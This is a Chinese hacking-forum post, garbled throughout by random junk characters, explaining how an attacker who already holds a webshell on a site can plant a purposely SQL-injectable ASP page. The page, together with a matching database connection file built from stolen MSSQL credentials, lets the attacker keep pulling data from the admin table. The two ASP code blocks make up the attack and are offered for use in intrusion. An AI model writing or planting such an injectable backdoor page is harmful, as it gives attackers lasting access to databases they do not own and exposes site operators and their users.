自己构造注入点方便入侵
' b* [7 E" x5 V: N9 D/ e, o y& f/ ^' l" s
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
; A2 i# a5 J# I/ X1 g, K' S$ Y. \' o/ a: \( C) X5 u( y
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!9 [. T2 H( d5 o- K+ D8 d
8 ]7 L/ V" L' o7 O& g5 V
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和+ ^3 B* `& ?) K2 r5 J/ {
7 C) K/ L# y/ G4 Q
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表6 y- C( x) N4 \0 F. q1 |
. D0 [6 i1 U% i" e% u
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
/ [; h# |" N: }+ z2 s9 H, K | P5 v; c5 R* T+ w
程序代码
! |) W3 i2 w: G/ o- Z0 e" C<!--#include file="xx.asp"-->
6 ^! @$ J, k) s+ h<%
6 M- M- I# o) Qset rs=server.createobject("ADODB.recordset")
" |) |9 {# x; ~2 T, b8 g/ q9 iid = request("id")6 c" i' u( H/ S& V+ A+ p) `- L
strSQL = "select * from admin where id=" & id
0 J* ?( x+ n7 | Hrs.open strSQL,conn,1,3
4 a8 Y" y, I- b' [4 q4 prs.close& V+ a8 M3 c% d% W- I
%>) \) U- I, U8 h/ Y4 ~
- k7 u) s1 M0 e4 d0 r把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
* n9 L) V& E% b! q: P# R( O/ U4 b1 A9 i
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
2 v) u7 z. S0 i0 V `
$ z4 T1 p7 }) c5 K然后就要构造一个连接数据库的文件了,代码如下:
: A0 E7 t$ N9 z& T2 l+ ]& E程序代码1 e1 s, T/ u. `) H
<% & N% M+ b5 s5 [+ I7 Y3 |: p5 `+ r }
strSQLServerName = "000.000.000.000" '服务器名称或地址4 [# x! F0 B4 N, d8 _6 O0 k& t
strSQLDBUserName = "sqlname" '数据库帐号
( C. {* F) }- P3 h9 ]% b1 UstrSQLDBPassword = "sqlpass" '数据库密码
2 }. A* \+ f+ ?strSQLDBName = "sqldataname" '数据库名称
! y8 N7 ] y8 m4 a7 HSet conn = Server.CreateObject("ADODB.Connection")
% V5 T7 ^8 K% `, i' C3 c( s# L! zstrCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"& }" i" B E3 N7 G
conn.open strCon, M4 a, A- }7 u; u8 ]
%>" p, u( i- z; q7 C
# Q x: ?7 a2 v# Y# T6 n
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
M0 n8 e5 M/ _
7 {- o6 d6 C" s8 k" e1 u9 x# s$ ^就这样,正常情况下,就OK了,伪造成功……6 ^+ L# y6 T- G' j1 c1 N" p
: F& L U: L( q E/ @; S
如果有什么问题可以提出来大家一起探讨解决。 |